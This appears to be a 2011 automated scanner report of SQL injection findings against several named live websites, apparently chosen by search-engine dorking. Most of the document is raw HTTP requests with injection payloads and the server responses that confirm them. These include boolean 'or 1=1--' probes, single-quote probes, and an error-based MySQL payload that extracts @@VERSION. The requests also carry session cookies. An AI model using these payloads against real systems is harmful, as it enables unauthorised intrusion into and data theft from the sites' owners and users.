Reflected XSS, SQL Injection, HTTP HEader Injection, Response Splitting, DORK GHRB Report on April 25, 2011

The h parameter appears to be vulnerable to SQL injection attacks. The payloads 52506121%20or%201%3d1--%20 and 52506121%20or%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d1--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


...[SNIP]...









































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>

<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />

   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {

           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }

           sWindowName = sWindowName || "newWindow";

           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);

           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

           newWindow.focus();

           }


   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new Ac
...[SNIP]...

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d2--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


...[SNIP]...





































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>

<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />

   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {

           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }

           sWindowName = sWindowName || "newWindow";

           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);

           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

           newWindow.focus();

           }


   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microso
...[SNIP]...

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21
               ORDER BY
               DMMESSAGE.ID' at line 7
</font>
...[SNIP]...

1.3. https://www.depthsecurity.com/WebResource.axd [d parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.depthsecurity.com
Path:	/WebResource.axd

Issue detail

The d parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the d parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d1--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

HTTP/1.1 302 Denied
Content-Type: text/html
Location: http://www.depthsecurity.com
X-dotDefender-denied: 1
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT
Connection: close

<html></html>

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d2--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth Security - A Trusted Information Security Partner</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<link rel="SHORTCUT ICON" href="images/icon.jpg" />
<meta name="keywords" content="Information Security Partner, Information Security Advisor, Network Security, Web Application Security, Depth Security, Vendor Independent Security Services, Security Architecture and Design" />
<meta name="description" />
<meta name="robots" content="all" />
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
</head>
<body class="main">
<div id="page">

<div id="header-holder">
<div id="header">
<div class="logo"><a href="home.aspx"><img src="images/logo_221x53.gif" width="221" height="53" alt="DepthSecurity.com" title="DepthSecurity.com" /></a></div>

<div id="header-nav">
<div class="option"><div class="hot1"><a href="home.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option"><div class="link2"><a href="company.aspx"><img src="images/1px.gif" width="66" height="14" /></a></div></div>
<div class="option"><div class="link3"><a href="services.aspx"><img src="images/1px.gif" width="62" height="14" /></a></div></div>
<div class="option"><div class="link4"><a href="applicure-technologies-partnership.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option" style="border-right:none;"><div class="link5"><a href="contact-us.aspx"><img src="images/1px.gif" width="81" height="14" /></a></div></div>
<div class
...[SNIP]...

1.4. https://www.depthsecurity.com/WebResource.axd [t parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.depthsecurity.com
Path:	/WebResource.axd

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d1--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d2--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 3005
Content-Type: application/x-javascript
Expires: Tue, 24 Apr 2012 13:10:53 GMT
Last-Modified: Thu, 31 Dec 2009 16:47:40 GMT
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:51 GMT

function WebForm_FindFirstFocusableChild(control) {
if (!control || !(control.tagName)) {
return null;
}
var tagName = control.tagName.toLowerCase();
if (tagName == "undefined") {
return null;
}
var children = control.childNodes;
if (children) {
for (var i = 0; i < children.length; i++) {
try {
if (WebForm_CanFocus(children[i])) {
return children[i];
}
else {
var focused = WebForm_FindFirstFocusableChild(children[i]);
if (WebForm_CanFocus(focused)) {
return focused;
}
}
} catch (e) {
}
}
}
return null;
}
function WebForm_AutoFocus(focusId) {
var targetControl;
if (__nonMSDOMBrowser) {
targetControl = document.getElementById(focusId);
}
else {
targetControl = document.all[focusId];
}
var focused = targetControl;
if (targetControl && (!WebForm_CanFocus(targetControl)) ) {
focused = WebForm_FindFirstFocusableChild(targetControl);
}
if (focused) {
try {
focused.focus();
if (__nonMSDOMBrowser) {
focused.scrollIntoView(false);
}
if (window.__smartNav) {
window.__smartNav.ae = focused.id;
}
}
catch (e) {
}
}
}
function WebForm_CanFocus(element) {
if (!element || !(element.tagName)) return false;
var tagName = element.tagName.toLowerCase();
return (!(element.disabled) &&
(!(
...[SNIP]...

1.5. http://www.eset.com/us/ [PHPSESSID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.eset.com
Path:	/us/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the PHPSESSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d1--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=rhlh0535fscpi8b9l3gmc676d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:15:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:15:10 GMT
X-Varnish: 555648175
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
   }

   var speed = 'fast';

   var j = jQuery.noConflict();
       var selectedTab = 0;
   j(document).ready(function(){
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');
       j("#link_tab"+selectedTab).addClass('selected');


       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {

                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });

           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;

           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);


           j(this).addClass('selected');



           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });

           return false;
       });

   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }

   div.page_banner{
       width: 980px;
       float: left;
   }

   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }


</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper" >
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>

...[SNIP]...

Request 2

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d2--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=p3m54lfgguit56nu0eqstd1vf5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:15:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26683
Date: Mon, 25 Apr 2011 15:15:11 GMT
X-Varnish: 555648227
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
e+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
   }

   var speed = 'fast';

   var j = jQuery.noConflict();
   var selectedTab = 0;
   j(document).ready(function(){
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');
       j("#link_tab"+selectedTab).addClass('selected');
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});

       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {

                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });

           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;

           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);


           j(this).addClass('selected');



           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });

           return false;
       });

   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }

   div.page_banner{
       width: 980px;
       float: left;
   }

   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }


</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper">
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>

...[SNIP]...

1.6. http://www.trucklist.ru/cars/undefined [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/undefined

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars'/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:45:31 GMT
Content-Length: 6600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /cars''/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 15:00:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:00:18 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.7. http://www.trucklist.ru/cars/undefined [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/cars/undefined

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /cars/undefined' HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
